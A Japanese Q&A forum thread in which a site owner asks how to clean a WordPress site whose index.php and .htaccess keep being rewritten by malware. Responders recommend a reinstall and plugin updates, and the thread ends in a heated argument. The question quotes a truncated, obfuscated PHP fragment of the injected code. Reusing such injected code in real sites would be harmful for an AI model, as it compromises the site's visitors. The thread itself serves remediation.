Q&A
URL公開しないほうが良いかと思います。
アクセスした人に被害が及びます(なので私は見ていません)。
それに世界中から閲覧が可能です。
「ここにマルウェア感染済みのサイト、サーバーがあるよ」って悪意ある人に教えているようなものです。
悪意ある人が押し寄せたら今以上に手遅れになりますよ。
質問自体を削除するようすすめます(編集では履歴に残ります)
既に手遅れの可能性がありますが、守りたいなら質問してアドバイス待っている場合ではないです。
危機意識を持ってください。1分1秒争います。
wordpressのサイトがマルウェア感染しました。
有害サイトへリダイレクト、不自然なファイルは削除しましたがまだ現状復帰には至っていません。
なにか確認すべきポイント、サーバー上のファイルなどがあればご教示願います。
#現状
現状としてはindex.phpへコードの挿入と.htaccessが勝手に書き換えられてアクセスできなくなってしまいます。
index.phpの挿入コードと.htacessをサーバーから初期化すれば一度ログインできますが、半日ほどたつとまた書き換えられてログインできなくなってしまいます。
###index.phpへ挿入コード(長過ぎるので抜粋、文字列は毎回変わります。)
<?php $O00O__0O_='wacHsRz0gczDso1vjLnzaMlwbNyD7kotgYp2uga0pL9XfY3zuLjm6dpp5Z7XfJ3x9d3W5V6lqbni95mj8b22x0n='; $O0_O0OO__=urldecod("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B64%($O00O__0OO_);?>##アドバイスして頂きたい点 確認すべきポイント、サーバー上のファイル、マルウェアスキャンツール 下記は使用済みで検出されたマルウェア感染ファイルは全て除去済み https://website-malware-removal.com/jp/ ##新規インストールでのリカバリー方法(最終手段) 新規WPインストールしたほうが早いかなと思い考え中です。 以下駄文になってしまいますが、マルウェアで書き換えられる範囲はサーバーファイル全てでしょうか? オリジナルテーマ、データベースエクスポートは最低限して新規インストールしたいですが、 これらも感染している可能性があるため倦ねています...
回答3件
0
基本的に削除して再インストールしたほうが安全だと思いますが、まずマルウェアでパスワードを抜かれている可能性と、マルウェアを消しきっていなくて復活している可能性があります。
wp-config.phpの先頭に@inculude 謎の文字列 等ある場合はそれがエンコードされたパスでそこからプログラムを読み込んでいるケースがあります。
投稿2020/10/29 15:17
総合スコア1426
serch regex的なもので@includeなどの特定の単語を検出するプラグインなどご存知でしょうか?
ssh接続してコマンド打つのも有りだとは思うのですが、不慣れなので調査時間かかるのとコマンドミスがあると精度落ちそうなので、、、
返事待ちしてる間に感染状態は続いており、場合によっては自分のサイトを踏み台によそのサーバーが攻撃される可能性がある事は頭に入れておきましょう。極端な話、それで捕まるのは質問者です。
SSHで接続してgrepで探したほうがいいと思いますが、対症療法に過ぎないので可能な限り再インストールしたほうが建設的だとは思います。
@inculudeは一例で、以前WPのマルウェアがあった時にwp-config.phpに記述されていたケースがあったという話です。
単純な文字列検索で危険な関数のコードを検索しても
難読化や冗長化がされていれば見つけ出すのは困難です
圧縮して画像ファイルなどに偽装していたりもします
スキャンでひっかけられないってことは
そういうことしてるってことでしょう
一度クリーンにしましょう
0
書き換えられるということは、FTPのパスワードがクラックされてるってことです。
とりあえずはサーバを初期化して、FTPを無効化、SSHでログイン、転送するようにするなどサーバの設定変更を行いましょう
投稿2020/10/29 13:45
総合スコア87778
ちなみにサーバーはレンタルサーバーhetemlです。
sshは無効化されています。またFTPのパスワードは変更済みです。
サーバー初期化とはどういう意味でしょうか?ファイルを全て削除?
ファイル削除ですな。
そのファイルの中に書き換えるようなマルウエア/ウィルスが含まれてるとかじゃないでしょうか
新規インストールするだけじゃ同じ事の繰り返しでしょう。穴塞がないと。
ワードプレスのバージョンが古いならバージョンを上げる、プラグインを使っているのなら最新のものする、長期間更新されてないプラグインや素性のうさんくさいプラグインは(内容調査出来ないなら)使うのをやめるなど
私の知見ではデーターベースのデータに感染するマルウェアはないと思うのですが、それは大丈夫ではないかと(たぶん、ないですよね)
そうなんですね。
DBに関してはhttps://website-malware-removal.com/jp/でも検出されず、不自然なテーブルもなかったので私もAP側の問題かなと思っています。
ならさっさと対処しましょうよ。
のんびりやってる場合じゃないですよ
0
自己解決
除染して自己解決しました。やっぱりAP上の問題で基本的にはソフト使って不審なファイルを除去、記述を削除です。バックアップしつつソフトで検出されたものは思い切って削除。
新規インストールも1つの手だと思いますが、プラグイン設定なども含めて膨大な時間が掛かりますし、正直アホの一つ覚えですね、、、
早く対策したほうがいいって既に感染しているわけですから時間の問題ではないです。
元の感染状況にはならないはずですがもし再発したら、そのときは最終手段使います。
投稿2020/10/31 00:13
編集2020/10/31 00:22総合スコア45
> 新規インストールも1つの手だと思いますが、プラグイン設定なども含めて膨大な時間が掛かりますし、正直アホの一つ覚えですね、、、
つまり元々使ってたプラグインを元々の設定のまま使うと。
> 早く対策したほうがいいって既に感染しているわけですから時間の問題ではないです。
あなたは「感染」が被害の全てだと思っているんですね?
それは始まりでしかありません。
「もうコロナに感染したからマスクは要らないし人ごみも怖くない」と言っているのと同じです。
それはただのコロナ脳ですね。
コロナに感染しましたが、回復していますし、マスクもしてます。
症状からいってもインフルエンザレベルでしょう。
コロナにもマルウェアにも適切に対策して除去すれば恐れることはありません。
周囲の人に同情します。
また攻撃されても構わないというスタンスなら別に止めませんが、サイト利用者への迷惑は考えた方がよろしいかと。
質問編集履歴から見れるので、攻撃してくれって言ってるようなもんですよ。
「除去すればいい」程度の考えだったから今回やられたのではないですか?コメントと対応からするに、今も大して変わってなさそうに思います。
サイト、サービスをいったん閉鎖した方が良いですよ。
一度でも感染したならそれはあなたのサイト自身が有害サイトになってしまったということです。なに食わぬ顔で続けるのは無理があります。
物事を上辺だけしか見れないんですね。
さっさと外注したほうがみんなHappyですよ。
あなたの回答
tips
プレビュー
